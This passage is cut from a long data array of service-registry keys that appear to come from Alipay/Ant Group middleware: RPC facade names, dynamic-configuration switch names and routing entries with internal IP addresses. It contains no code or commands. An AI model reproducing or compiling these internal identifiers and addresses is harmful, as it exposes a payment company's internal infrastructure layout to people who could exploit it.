_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_K_CUSTOMER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.167.194.230#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.category.WordDownloadManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilewealth.common.service.facade.api.BankCaifuhaoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_FC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cschannel.common.service.facade.chat.api.ChatMessageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.papers.common.service.facade.ImageProcessingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileaix.common.service.facade.MobileAiSolutionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pushcore.data.GzoneDataImportFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_onstopmng_ostsProjectUpdateAuditGatewayFacadeService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iMatchfacadeAntProcessCallback3@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.personal.service.user.uncertifyfreeze.UncertifyFreezeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.runtimedatasrcmng.common.service.facade.api.process.config.ProcessConfigManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.operator.AloneOperatorRZService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmMerchantCardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.GuardianTaskStatisticCoreService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zcache.switcher.bankcardTairCache.switcherValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.253.163#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.fcbuservice.common.service.facade.AuthFacade:1.0:antacl@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:yebplus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.common.service.facade.AccountOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CINSPFRONT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.merchant.MrchProdImageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepconnector.facade.service.EpBusinessCardManagerQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.riskmngPunishcenterTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antforest.common.service.facade.triple.Double11CoinFacade:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.NewKeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minicenter.common.service.facade.api.developerinfo.DeveloperInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.api.TaskServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antinvoice.core.service.workflow.balance.Balance:1.0:titleFuzzyQueryBalance@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.hell.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.fcbuservice.common.service.facade.AttributeFacade:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbrecruit.common.service.facade.touch.InvitedNotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbprod.common.service.facade.transfer.TransferManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappconfig.common.service.facade.api.AppReleaseManagerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.bankcardTairCache_dest.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.publiccore.common.service.integration.opencore.PublicAppFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:socialdispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:staffRecommendDownloadCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.open.product.ProductServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.skipStopProfitRedeemMessageFlag,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.36.24.20#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_INFOSECDEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegeocoding.common.service.facade.district.ReverseProFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-alphatesttwa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publichome.common.service.facade.shop.BindingShopServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.api.CollectTransTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.FeedbackApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frgcenter.common.service.facade.api.FundFlowServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.common.service.facade.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:imobileappng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.lendpofprod_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_datanest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:insdataprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.mng.AbilityLabServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditint.facade.service.DebitTransferFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.spatial.service.SpatialLBSQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.ops.OpsCacheFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.certifymng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.holoxmng.content.service.facade.SceneConfigService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:basement-omega@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.resource.facade.vpc.VPCFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_TELSELFHELP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcreservecenter_processCallbackFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.serverlesspaasopschange.ServerlessPaasOpsChangeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.ipay.iliquidity.biz.manager.menu.MenuManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.common.service.facade.iot.IotPayBoxQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.MerchantRelationPageQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finsupport:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:opscloudprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","globalprod@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cif.facade.CustomerRoleInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.extension.component.ContentExtensionService:1.0:contentlib@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.AddressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.doublewrite.DoubleWriteGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emccenter.common.service.facade.api.AemcStartRuleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:needSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compass.common.service.facade.api.RequestCoverServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.127.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:creditvisaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbdatacenter.common.service.facade.tag.crowd.TagCrowdFacadeV2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:unitradeprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobilechat@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:keyRiskIndicatorExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.vostroflux.service.spi.VostroTradeService:1.0:bkcloudfunds@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.live.api.LiveCourseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.schedule.operation.platform.facade.operation.InstanceOpsApi:1.0:schedule-operation-platform@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.biz.manager.ClientPerfOverallManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.couriercore.common.service.api.BatchSubTaskService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.charge.OrderLinkNotifyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.biz.service.impl.lbs.LBSEventProcessManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.arcore.common.service.facade.ArVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetInfoSyncManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:reading@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.144.166#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.CreditAgreementConsistGzQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.core.service.drm.CouponTemplateControlResource.newProcessProduct,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mrchiscore:name=com.alipay.mrchiscore.common.util.drm.K53SwitchZ50GrayDRM.blackUIDs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditdecisionx.common.service.facade.auth.api.StagePayAssetAuthService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.84.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acprodapicore.facade.manageapi.RuntimeApiGroupManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.vouchercore.facade.api.voucher.VoucherManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.177.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.lendpofprod.common.service.facade.loanapi.apply.LoanApplyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pccmc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_6400#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.merchant.common.service.facade.OrderQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pcreditquery.common.api.PcreditQueryNotesFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.45.65.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.insproductcore.facade.service.InsFcProductConfig4MngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.30.192.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charityprod.commom.service.facade.AppropriateTwoPhaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stocksupervise.common.service.facade.UserAuthStatisticsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.antscheduler.facade.IProductInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.nodejs.ConsumerService:1.0:zmepcreditwebsite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.irisbizprod.facade.diagnose.net.NetDiagnoseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromoscene.common.service.facade.api.camp.UserCampQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:odcalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zoneclient.pub.server.url#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_10.15.236.102#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.miniselfop.facade.api.selfopact.SelfOpActUserQueryFacade:1.0:selfOpActUserQueryFacadeUniqueId@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_AEICORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.custdecision.service.starstage.facade.StarstageUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.store.query.StoreQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_NECBILL#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.facade.BsbCommonFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.app2.Interface2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.common.acl.AccessControlService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_buc_bucUserQueryGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.97.9#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insdataprod.common.service.facade.api.AutoInsScoringFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.frgcenter.common.service.facade.api.RiskModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCacheCZone_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.cif.drm.PasswordRevokeSwitch.operationPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA-SCHEDULER-S-mnotify-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.supergw.service.facade.transaction.RecoverService:1.0:supergw.d6588.alipay.net@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_M_APP#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","NS_Pub_Servers_TP_C_INTIMATE_PAY_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.watchMember,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.arater.common.service.facade.api.management.topic.RateTopicMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.common.security.dresource.SecurityCommonDrm.corsWhiteHostList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.inremit.rpc.InremitCustomerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilechat.common.service.facade.api.GroupUpdateServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.flowctrl62#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileiclib.common.service.facade.ukey.UkeyCustomParamFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INSXHBCLAIMPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinbaseprod.biz.service.gw.antsearch.api.AntSearchManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditauthprod.service.facade.migration.PcreditAuthSignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradeguard.common.service.facade.loadtest.PurchaseProductSyncLoadTestFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.BaoXianKeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vouchercore.facade.api.voucher.VoucherWithdrawFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.consumeprod.common.service.voucher.facade.VoucherUniformFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.exceptionana.ClientExceptionMetaDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antemc.service.facade.TrsbrainMsgEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finquotationcenter.common.service.facade.api.RankQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmeteragecore.common.service.facade.PrimaryMeterDataPushFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.cfin.cfamount.common.service.facade.amount.CreditQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.zpaas.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finscene.common.service.facade.api.StrategyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilesync.common.service.facade.api.SyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.ccdc.common.service.facade.UserCardInfoGzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.facade.DecisionService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromomng.common.service.facade.api.template.VoucherPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.apshopcenterTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rdeclarecenter.common.util.AntConfigService:1.0:antConfigService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.SaleGoalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.face.common.service.facade.FaceFunRunFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.csbizcenter.facade.ContentGroupConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_100.83.30.198#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.0.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antmembermng.common.service.facade.antprocess.AntprocessAuditService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.247.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.inscontentprod.common.service.facade.live.LiveAnchorMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.191.0#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.timeout.common.service.facade.api.TimeoutExecutor:1.0:transferprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.common.service.integration.openeco.OpenEcoClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilegeocoding.common.service.facade.district.ReverseProFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.39.190.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.ucdpmng.facade.api.MaterialPoolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:microloan_agdscsalipay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opssla.common.service.facade.ResourceManageFacade:1.0:riskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.habaseline.common.facade.view.gray.GrayMeshFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.pointmng.common.service.integration.drm.VoucherConfigResource.customJs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openexprod.common.service.facade.UserInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.159#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iotcore.common.service.facade.api.RtsLiveApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.exratecenter.service.facade.api.ExOriginRateMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.drm71#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:aciamconsolefxw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appxcore.common.service.facade.api.databoss.DatabossQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.43.41#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphasec.compass.record.facade.RecordQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.territory.TerritoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdalproxy.interfaces.endpoint.facade.rest.api.SchemaApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.settlequery.common.service.facade.config.template.ParseTemplateQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcraftsman.common.facade.backend.CommonLockModifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.DeductPayRouterResource.isValid,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antlaw.common.service.facade.api.SystemConfigFacade:1.0:antlescenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acmcscore.facade.RocMainFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.antgroup.zmxy.zmvisaprod.common.service.facade.api.VisaConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:bic@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppcore.facade.confmng.ChargeInstMngFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.GiftFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprotocol.kyc.service.facade.KycQualifiedInvestorQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.dt.RopOnePageOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingCorpUserFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lowercaseFirst:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM